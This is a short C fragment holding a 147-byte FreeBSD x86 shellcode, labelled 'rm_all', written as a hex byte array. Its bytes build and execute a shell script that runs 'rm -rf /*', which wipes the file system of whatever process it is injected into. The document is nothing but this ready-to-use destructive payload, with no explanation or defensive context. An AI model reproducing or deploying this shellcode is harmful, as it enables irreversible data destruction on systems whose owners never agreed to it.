
/* rm_all shellcode 4 freebsd x86 */
/* size = 147 bytes */

char fbsd_shellcode[] = 

"\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\x53\x6A\x0C"
"\x50\xCD\x80\x31\xC0\x50\x68\x7A\x79\x78\x61\x89\xE3"
"\x66\x68\xED\x01\x66\x68\x01\x02\x53\x6A\x05\x50\xCD"
"\x80\x89\xC2\x31\xC0\x50\x68\x2F\x2A\x20\x26\x68\x2D"
"\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B\x69\x6C\x6C"
"\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E"
"\x2F\x73\x68\x23\x21\x2F\x62\x89\xE3\x6A\x20\x53\x52"
"\x6A\x04\x50\xCD\x80\x31\xC0\x52\x6A\x06\x50\xCD\x80"
"\x31\xC0\x50\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69"
"\x89\xE3\x50\x68\x7A\x79\x78\x61\x89\xE1\x50\x51\x53"
"\x89\xE2\x50\x52\x53\x6A\x3B\x50\xCD\x80\x31\xC0\x6A"
"\x01\x50\xCD\x80";

